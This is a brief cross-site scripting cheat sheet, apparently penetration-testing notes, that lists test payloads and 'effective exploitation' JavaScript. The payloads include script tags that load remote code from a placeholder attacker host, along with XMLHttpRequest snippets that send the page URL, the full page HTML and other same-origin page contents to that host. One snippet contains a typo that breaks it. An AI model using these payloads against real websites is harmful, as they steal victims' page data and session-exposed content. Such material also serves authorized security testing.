Cross-Site Scripting (XSS)

Test payloads

<img src="http://<attacker url>">

<script>document.location="http://<attacker url>"</script>

<script>alert("testing123")</script>

Execute remote XSS payload

<script src="http://<attacker>/xss.js"></script>

Effective exploitation examples

Get current location of webpage

var exfilreq = new XMLHttpRequest();    
exfilreq.open("GET", "http://<attacker>/" + document.location, false);    
exfilreq.send();

Get contents of current page

var exfilreq = new XMLHttpRequest();    
exfilreq.open("POST", "http://<attacker>/", false);    
exfilreq.send(document.documentElement.outerHTML);

Get contents of specified webpage

var pagereq = new XMLHttpRequest();    
pagereq.onreadystatechange = function() {              
  if (pagereq.readyState == 4) {                       
    varexfilreq = new XMLHttpRequest();                    
   exfilreq.open("POST", "http://<attacker>/", false);                                                      
   exfilreq.send(pagereq.response);                 
  }     
};    
pagereq.open('GET', '/<web page>', false);    
pagereq.send();